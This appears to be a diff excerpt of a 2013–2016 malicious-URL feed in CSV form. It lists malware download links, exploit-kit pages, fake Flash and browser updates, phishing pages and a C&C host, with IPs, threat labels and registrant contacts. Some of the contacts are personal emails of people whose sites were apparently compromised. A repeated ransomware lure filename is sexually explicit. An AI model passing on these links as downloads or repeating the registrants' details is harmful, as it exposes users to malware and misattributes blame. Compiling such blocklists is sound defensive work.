+"2013/05/12_14:55","-","5.135.115.193:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","serv2-am.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.194:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.195:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta1.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.196:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta2.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.197:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta3.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.198:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta4.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.199:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta5.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.201:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta7.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.202:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta8.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.203:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta9.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.204:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta10.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.205:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta11.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.206:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta12.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.207:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta13.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.208:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta14.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.209:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta15.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.210:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta16.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.211:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta17.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.212:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta18.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.213:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta19.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.214:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta20.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.215:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta21.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.216:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta22.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.217:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta23.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.218:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta24.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.219:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta25.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.220:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta26.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.221:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta27.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","5.135.115.222:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","mta28.serv1-am-mta.com.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/12_14:55","-","66.175.218.117:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","li513-117.members.linode.com.","Trojan.FakeAlert","-","6939","0","US", +"2013/05/12_14:55","-","78.110.162.72:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","78-110-162-72.rdns.ldni.net.","Trojan.FakeAlert","-","42831","0","GB", +"2013/05/12_14:55","-","78.110.162.73:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","78-110-162-73.rdns.ldni.net.","Trojan.FakeAlert","-","42831","0","GB", +"2013/05/12_14:55","-","78.110.162.79:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","78-110-162-79.rdns.ldni.net.","Trojan.FakeAlert","-","42831","0","GB", +"2013/05/12_14:55","-","85.214.133.237:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","gamelevel.de.","Trojan.FakeAlert","-","6724","0","DE", +"2013/05/12_14:55","-","94.23.38.214:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","ns368891.ovh.net.","Trojan.FakeAlert","-","16276","0","FR", +"2013/05/20_18:00","yougube.com","199.223.209.169","server.ambertechnic.com.","Redirects to Rogue.FakeFlashPlayer","Email:k8atacs4f84bd7a8c158@t02cduv4f7f99a255f64.privatewhois.net","25847","0","US", +"2013/05/20_18:00","youtuhe.com","174.140.17.100","-","Redirects to Rogue.FakeFlashPlayer","15520009924361-f52e2a@whoisprivacyservices.com.au","32311","0","US", +"2014/03/11_22:39","ukonline.hc0.me/Host.exe","5.135.127.68","-","DR/AutoIt.Gen2","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2013/05/20_20:35","youtibe.com","173.193.106.10","173.193.106.10-static.reverse.softlayer.com.","Redirects to Rogue.FakeFlashPlayer","Domain Admin (contact@privacyprotect.org","36351","0","US", +"2014/03/11_22:39","ukonline.hc0.me/new.exe","5.135.127.68","-","DR/AutoIt.Gen2","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2013/06/03_19:38","-","143.95.1.6/31b9326e5a618c53/a.php","ip-143-95-1-6.iplocal.","exploit kit","-","36444","0","US", +"2013/06/05_20:17","www.tdms.saglik.gov.tr/KDV_Guncel_Tevkifat_Oranlari.htm","212.175.169.227","-","compromised sites leads to exploit kit","Salk Bakanl / netsistem@saglik.gov.tr","9121","0","TR", +"2013/06/17_11:56","sunny99.cholerik.cz/plugins/3yvPRqFJ.php","77.93.211.244","f.banan.cz.","redirects to exploit kit","Martin Toman / tomanmartiny@seznam.cz","24971","0","CZ", +"2013/06/20_11:20","www.rooversadvocatuur.nl/rel.php","83.172.140.27","ns1.securenameserver5.net.","redirects to exploit kit","-","25459","0","NL", +"2013/06/20_14:31","-","212.124.116.129:8080/7167888324/3503.zip","-","Java exploit","-","47328","0","RU", +"2013/06/20_14:31","-","212.124.116.129:8080/7167888324/1.zip","-","Java exploit","-","47328","0","RU", +"2013/06/21_10:17","-","212.124.116.141:8080/7167888324/2.zip","-","Java exploit","-","47328","0","RU", +"2013/06/21_10:17","-","212.124.116.141:8080/7167888324/7521.zip","-","Java exploit","-","47328","0","RU", +"2013/07/11_02:06","malest.com","208.115.233.154","154-233-115-208.static.reverse.lstn.net.","Leads to fake Google Chrome","shihengzhong@web.de","46475","0","US", +"2013/07/11_02:06","dl01.faddmr.com/n/e176d94e-d9b7-11e2-a752-00259033c1da/Setup.exe?tid=102dccc4aa5799d2efb748b9dd0e4fFake","50.17.189.198","ec2-50-17-189-198.compute-1.amazonaws.com.","Google Chrome","Domains By Proxy, LLC / -","14618","0","US", +"2013/07/11_02:06","dl01.faddmr.com/n/3.0.15.1/9041377/Setup.exe?tid=102dccc4aa5799d2efb748b9dd0e4f","50.17.189.198","ec2-50-17-189-198.compute-1.amazonaws.com.","Fake Google Chrome","Domains By Proxy, LLC / -","14618","0","US", +"2013/07/11_07:25","www.rebeccacella.com/wp-content/plugins/subscribe/","212.227.31.159","kundenserver.de.","compromised site leads to exploit kit","rebeccacella@hotmail.com","8560","0","DE", +"2013/07/11_12:54","www.lowes-pianos-and-organs.com/images/d521c2a038/?zAXbu4Wah12XtNHf0YTNwgTNwIjM0ATMzIDfvgzMwEmMjFjM1Q2LzV2Zh1Wav02bj5","67.222.109.112","d15.altserver.com.","ycuF2Zy9WLk5WYtM3buFWaw1ycld3bs5yd3d3LvoDc0RHa8NnZ exploit kit","Registrant admin@titaninternet.com.au","33494","0","US", +"2013/07/11_16:54","lcbcad.co.uk/4541b36fdd41b9610c2e870b21fc5022/q.php","78.129.250.40","server.brainstormdevelopment.co.uk.","exploit kit","Leeds College of Building / -","20860","0","GB", +"2013/07/22_11:48","v.inigsplan.ru/lich/inc/v7675/?/","90.156.212.70","v7675.vps.masterhost.ru.","redirects to Postbank phishing","-","25532","0","RU", +"2013/07/22_11:48","mailboto.com/landing/themes/bluemarine/corso/index.htm","64.235.52.182","mailboto.com.","Postbank phishing","Domains By Proxy, LLC / -","26277","0","US", +"2013/07/23_16:30","guyscards.com/adobe/","184.95.37.100","-","Fake.FlashPlayer.Trojan","Guy Sanford / -","20454","0","US", +"2013/07/23_16:30","guyscards.com/adobe/update_flash_player.exe","184.95.37.100","-","Trojan","Guy Sanford / -","20454","0","US", +"2013/07/25_06:19","teameda.comcastbiz.net/expanding/index.html","216.87.186.173","-","leads to exploit kit","Corporation Service Company / e28eefcc1cdd5b95c3b663@reg.csccorporatedomains.com","30217","0","US", +"2013/07/25_06:19","wc0x83ghk.homepage.t-online.de/communed/ameba.js","80.150.6.138","b2c.t-online.de.","redirects to exploit kit","hostmaster@t-online.net","3320","0","DE", +"2014/03/20_18:19","instruminahui.edu.ec/201403/editor.html","74.207.242.230","host.saaslibre.info.","exploit kit","geovanni simbaña / sgeovani75@hotmail.com","6939","0","US", +"2013/07/25_06:31","server1.extra-web.cz/dbm.exe","212.80.69.55","xhosting.cz.","trojan","tefan Ihnat / stefan.ihnat@email.cz","29208","0","CZ", +"2013/08/02_13:16","nutnet.ir/dl/nnnew.txt","64.79.83.14","-","Leads to exploit","Seyed Alireza Miri Lavasani / SAML_ROMMEL@YAHOO.COM","10297","0","US", +"2013/08/04_04:46","-","188.190.125.173/xUmEqHqYxi/uxrpdvcjbk.php?rehnreh=sjXovBJv&kjrthdrgs=13788997&rjthergsf=893","-","Exploit","-","197145","0","UA", +"2013/08/07_19:06","eliehabib.com/topic/regard_alternate_sheet.php","173.246.105.15","-","Exploit","-","29169","0","US", +"2013/08/07_18:57","kipasdenim.com/images/wp-sts.php","94.73.146.50","94-73-146-50.cizgi.net.tr.","Leads to exploit","mehmet kutlu / mkinanc@gmail.com","34619","0","TR", +"2013/08/07_18:57","praxisww.com/wp-stc.php","69.26.171.30","webprecision.com.","Leads to exploit","Praxis Communications / eric@praxisww.com","27524","0","US", +"2013/08/07_18:57","romvarimarton.hu/wp-stc.php","195.56.150.12","mail.kepstudio.hu.","Leads to exploit","-","3340","0","HU", +"2013/08/07_18:57","saemark.is/wp-content/plugins/wp-sts.php","212.30.229.50","-","Leads to exploit","Sæmark-Sjávarafurðir ehf / siggi@saemark.is","44515","0","IS", +"2013/08/07_18:57","vitamasaz.pl/wp-stc.php","188.116.35.5","n22.netmark.pl.","Leads to exploit","domeny@ConsultingService.pl","43333","0","PL", +"2013/08/07_18:57","www.coloritpak.by/wp-stc.php","93.125.99.11","vh41.hosterby.com.","Leads to exploit","-","6697","0","BY", +"2013/08/07_18:57","www.fasadobygg.com/wp-stc.php","78.110.82.72","host-78-110-82-72.n62.se.","Leads to exploit","contact@privacyprotect.org","31507","0","SE", +"2013/08/07_18:57","www.hausnet.ru/wp-stc.php","188.191.224.17","ks17.hausnet.ru.","Leads to exploit","-","197624","0","RU", +"2013/08/07_18:57","www.joomlalivechat.com/wp-stc.php","174.129.234.86","ec2-174-129-234-86.compute-1.amazonaws.com.","Leads to exploit","-","14618","0","US", +"2013/08/07_18:57","www.litra.com.mk/wp-sts.php","98.130.102.2","rev.opentransfer.com.2.102.130.98.in-addr.arpa.","Leads to exploit","-","32392","0","US", +"2013/08/07_18:57","www.over50datingservices.com/wp-stc.php","79.170.44.116","web116.extendcp.co.uk.","Leads to exploit","Administrative brian@kaneconsult.co.uk","31727","0","GB", +"2013/08/07_18:57","www.praxisww.com/wp-stc.php","69.26.171.30","webprecision.com.","Leads to exploit","Praxis Communications / eric@praxisww.com","27524","0","US", +"2013/08/07_18:57","www.saemark.is/wp-content/plugins/wp-sts.php","212.30.229.50","-","Leads to exploit","Sæmark-Sjávarafurðir ehf / siggi@saemark.is","44515","0","IS", +"2013/08/07_18:57","www.wyroki.eu/wp-stc.php","85.128.187.109","ame109.rev.netart.pl.","Leads to exploit","NOT DISCLOSED! / admin@netart.pl","15967","0","PL", +"2013/08/12_07:18","manoske.com/main.php?label=TJaxqKIV0+wlz0MJN5SxypUhWaVDQDqE4PwfdxjPls0=","184.173.230.95","184.173.230.95-static.reverse.softlayer.com.","trojan inside zip file","-","36351","0","US", +"2013/08/23_11:55","-","174.142.240.91/577ac477f62d4873cf41dc834d107b7c/influences-portal.php","-","exploit kit","-","32613","0","CA", +"2013/09/12_05:43","mmile.com/images/rhcs05.exe","206.72.201.52","mmile.com.","Trojan.Zbot","Registrar Abuse Contact abuse@1and1.com","19318","0","--", +"2013/08/23_16:54","highflyingfood.com/images/vids/adobe_flash.exe","81.27.105.160","160-105-27-81.inetc.net.","Trojan.Ransom","Brash Solutions Ltd / brash@ukgateway.net","24851","0","GB", +"2013/08/23_16:54","highflyingfood.com/images/vids/","81.27.105.160","160-105-27-81.inetc.net.","Exploit","Brash Solutions Ltd / brash@ukgateway.net","24851","0","GB", +"2013/08/23_16:54","highflyingfood.com/images/vids/qp.php?out","81.27.105.160","160-105-27-81.inetc.net.","Exploit","Brash Solutions Ltd / brash@ukgateway.net","24851","0","GB", +"2013/08/23_16:54","highflyingfood.com/images/vids/archives/porno1.zip","81.27.105.160","160-105-27-81.inetc.net.","Trojan.Ransom","Brash Solutions Ltd / brash@ukgateway.net","24851","0","GB", +"2013/08/23_16:54","highflyingfood.com/images/vids/archives/porno2.zip","81.27.105.160","160-105-27-81.inetc.net.","Trojan.Ransom","Brash Solutions Ltd / brash@ukgateway.net","24851","0","GB", +"2013/08/23_16:54","highflyingfood.com/images/vids/archives/porno3.zip","81.27.105.160","160-105-27-81.inetc.net.","Trojan.Ransom","Brash Solutions Ltd / brash@ukgateway.net","24851","0","GB", +"2013/08/23_16:54","highflyingfood.com/images/vids/archives/porno4.zip","81.27.105.160","160-105-27-81.inetc.net.","Trojan.Ransom","Brash Solutions Ltd / brash@ukgateway.net","24851","0","GB", +"2013/08/23_16:54","highflyingfood.com/images/vids/archives/porno5.zip","81.27.105.160","160-105-27-81.inetc.net.","Trojan.Ransom","Brash Solutions Ltd / brash@ukgateway.net","24851","0","GB", +"2013/08/23_16:54","highflyingfood.com/images/vids/archives/porno6.zip","81.27.105.160","160-105-27-81.inetc.net.","Trojan.Ransom","Brash Solutions Ltd / brash@ukgateway.net","24851","0","GB", +"2013/08/27_07:50","-","62.76.189.216","62-76-189-216.clodo.ru.","Leads to ransomware","-","57010","0","RU", +"2013/08/27_07:50","-","62.76.189.216/firefox/firefox.html","62-76-189-216.clodo.ru.","Leads to ransomware","-","57010","0","RU", +"2013/08/27_07:50","-","62.76.189.216/chrome/chrome.html","62-76-189-216.clodo.ru.","Leads to ransomware","-","57010","0","RU", +"2013/08/27_07:50","-","62.76.189.216/ie/ie.html","62-76-189-216.clodo.ru.","Leads to ransomware","-","57010","0","RU", +"2013/08/27_07:50","-","62.76.189.216/chrome/ChromeUpdate.exe","62-76-189-216.clodo.ru.","Trojan.FakePutt","-","57010","0","RU", +"2013/08/27_07:50","-","62.76.189.216/firefox/FirefoxUpdate.exe","62-76-189-216.clodo.ru.","Trojan.FakePutt","-","57010","0","RU", +"2013/08/27_07:50","-","62.76.189.216/ie/IEUpdate.exe","62-76-189-216.clodo.ru.","Trojan.FakePutt","-","57010","0","RU", +"2013/08/30_07:38","windspotter.net/?r=site/widget","178.63.73.213","static.213.73.63.178.clients.your-server.de.","compromised site leads to Java exploit","-","24940","0","DE", +"2013/08/30_10:31","-","64.151.226.150/7aa1c07e79cac0a6beeccff5c987b36f/websites-reproductive.php","-","exploit kit","-","26753","0","CA", +"2013/09/06_04:59","luggage-tv.com/adobe/update_flash_player.exe","174.140.171.207","-","Trojan.FareIT","-","46816","0","US", +"2013/09/06_04:59","luggagepreview.com/adobe/update_flash_player.exe","174.140.171.207","-","Trojan.FareIT","-","46816","0","US", +"2013/09/06_04:59","luggagecast.com/adobe/update_flash_player.exe","174.140.171.207","-","Trojan.FareIT","-","46816","0","US", +"2013/09/06_04:59","-","174.140.171.207/adobe/update_flash_player.exe","-","Trojan.FareIT","-","46816","0","US", +"2013/09/06_04:59","kapcotool.com/adobe/update_flash_player.exe","74.207.227.154","li69-154.members.linode.com.","Trojan.FareIT","-","3595","0","US", +"2013/09/06_04:59","kapcotool.com/topic/able_disturb_planning.php","74.207.227.154","li69-154.members.linode.com.","Exploit","-","3595","0","US", +"2013/09/06_04:59","luggage-tv.com//topic/able_disturb_planning.php","174.140.171.207","-","Exploit","-","46816","0","US", +"2013/09/06_04:59","luggagepreview.com//topic/able_disturb_planning.php","174.140.171.207","-","Exploit","-","46816","0","US", +"2013/09/06_04:59","by98.com/reincarnate/index.html","210.152.132.10","10.0/25.132.152.210.in-addr.arpa.","Leads to exploit","For more information, please contact hostmaster@gmo.jp.","4694","0","JP", +"2016/09/14_20:05","ad.getfond.info","83.217.26.203","ru2.com.","PlugX C&C","jack tom / tom19822018@outlook.com","200161","0","RU", +"2013/09/06_04:59","-","202.212.131.8/ruses/nonsmokers.js","www.melodian.co.jp.","Leads to exploit","-","2514","0","JP", +"2013/09/06_04:59","-","207.188.69.171/colosseum/robed.js","207.188.69.171.tor.pathcom.com.","Leads to exploit","-","11342","0","CA", +"2013/09/06_04:59","dcanscapital.co.uk/panhandled/scientists.js","212.1.212.89","-","Leads to exploit","Isaac Osei / -","47583","0","US", +"2013/09/06_04:59","japanesevehicles.us/vector/internees.js","50.87.72.219","50-87-72-219.unifiedlayer.com.","Leads to exploit","Muhammad Azeem Choudhry / alimedic@cyber.net.pk","46606","0","US", +"2013/09/06_04:59","teameda.net/tipsier/stuttgart.js","216.87.186.173","-","Leads to exploit","Michael Mclain / mike@teameda.comcastbiz.net","30217","0","US", +"2013/09/06_04:59","luggagecast.com/topic/able_disturb_planning.php","174.140.171.207","-","Exploit","-","46816","0","US", +"2013/09/06_04:59","-","174.140.171.207/topic/able_disturb_planning.php","-","Exploit","-","46816","0","US", +"2013/09/12_05:43","mmile.com/images/bl.exe","206.72.201.52","mmile.com.","Trojan.Inject","Registrar Abuse Contact abuse@1and1.com","19318","0","--", +"2013/09/12_05:43","www.moviedownloader.net/d/GraboidMovieDownloader-3.54.exe","64.20.45.228","-","Adware.Fusenet","-","19318","0","--", +"2013/09/12_05:48","bluecutsystem.com/load3.exe","173.254.28.141","just141.justhost.com.","Trojan.Zbot","Saeed Azadipour / asmai55@gmail.com","46606","0","--", +"2013/09/12_05:48","-","103.31.186.29/2013/girl-fucked-by-dog.avi.exe","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsvrx.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsvtp.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidswsy.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidswtb.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidswys.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsxlo.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsxmx.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsxpg.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsxpp.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsxwu.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsycs.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsyip.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsymz.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsyre.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsyyf.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidszmi.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsznj.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsznx.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidscqs.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidscut.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsdob.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsdst.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsfgd.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidshhr.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidshkk.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidshrw.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsiet.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsiww.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsjac.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsjan.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsjhn.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsjtq.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidslmf.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidslni.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidslqk.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidslrz.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsnlq.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsnrt.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsnvd.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsnyp.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsolh.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsotz.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsowd.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidspeq.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsqof.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", +"2013/09/12_05:48","tube8vidsrau.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsrdr.dnset.com/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","Network Operations, ChangeIP / noc@changeip.com","39743","0","--", +"2013/09/12_05:48","tube8vidsrhl.ddns.name/2013/girl-fucked-by-dog.avi.exe","103.31.186.29","lh22450.voxility.net.","Trojan.Ransom","-","39743","0","--", 